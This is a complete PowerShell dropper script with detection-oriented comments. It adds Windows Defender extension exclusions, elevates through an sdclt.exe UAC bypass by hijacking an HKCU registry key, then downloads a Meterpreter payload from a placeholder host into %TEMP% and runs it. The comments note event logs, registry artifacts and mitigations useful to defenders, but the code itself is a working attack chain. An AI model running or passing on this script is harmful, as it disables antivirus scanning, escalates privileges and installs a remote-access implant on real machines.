# Flat script: stages a Defender exclusion, elevates it through the sdclt.exe
# UAC bypass, then downloads and launches a second-stage binary from %TEMP%.
# Annotations below are written from a detection/mitigation viewpoint; each
# step leaves an artifact that endpoint telemetry can be tuned to surface.
# Define local filename and URL to Dropper/Implant
$pl_filename = "Reader_sl.exe"
$pl_Uri = "http://127.0.0.1/Meterpreter.exe"
# Write the Defender exclusion command to a file in $ENV:TEMP.
# This does not disable Defender outright: it adds ".exe" and ".zip" to the
# extension exclusion list so later stages are not scanned. Preference changes
# made through Add-MpPreference are recorded in the Windows Defender
# Operational event log (event ID 5007), which is the primary detection point.
$filename = $env:temp + "\" + "CONTOSO.ps1"
New-Item $filename
$cli = 'Add-MpPreference -ExclusionExtension (".exe", ".zip")'
Set-Content $filename $cli
# Leveraging UAC bypass (SDCLT.exe) to run our above script with Admin privileges.
# The per-user Folder\shell\open\command verb under HKCU is pointed at the
# script above; sdclt.exe, an auto-elevating Windows binary, is then started so
# the handler presumably runs elevated (mechanism not shown here; inferred from
# the author's comment). "-executionpolicy bypass" is part of the command line.
# DelegateExecute is created with no -Value, i.e. an empty property.
# Detection: any write to HKCU:\Software\Classes\Folder\shell\open\command, and
# sdclt.exe spawning powershell.exe. Mitigation: UAC at "Always notify" or a
# non-administrator daily-use account, so auto-elevation is not available.
$cmd = 'powershell.exe -executionpolicy bypass ' + $filename + ''
New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value $cmd
New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
Start-Process -FilePath $env:windir\system32\sdclt.exe
# Sleep for 15 seconds to allow the exclusions to register before downloading Stage 2.
# The script never verifies that the exclusion was actually applied; it relies
# on the fixed delay alone.
Start-Sleep -s 15
# Download the second-stage payload over plain HTTP into %TEMP% and execute it.
# Detection: Invoke-WebRequest from a PowerShell process followed by
# Start-Process of a freshly written executable in the user's temp directory;
# an unencrypted HTTP fetch is also visible to proxy/network logging.
Invoke-WebRequest -Uri $pl_Uri -OutFile $env:temp\$pl_filename
Start-Process -FilePath $env:temp\$pl_filename
# Remove the temporary script and the hijacked registry key to restore sdclt.exe
# behaviour. Note that nothing here removes the Defender exclusions added above,
# so "Get-MpPreference | Select ExclusionExtension" still exposes the change
# after the script finishes, and the key deletion itself is a registry event.
Remove-Item $filename
Remove-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command"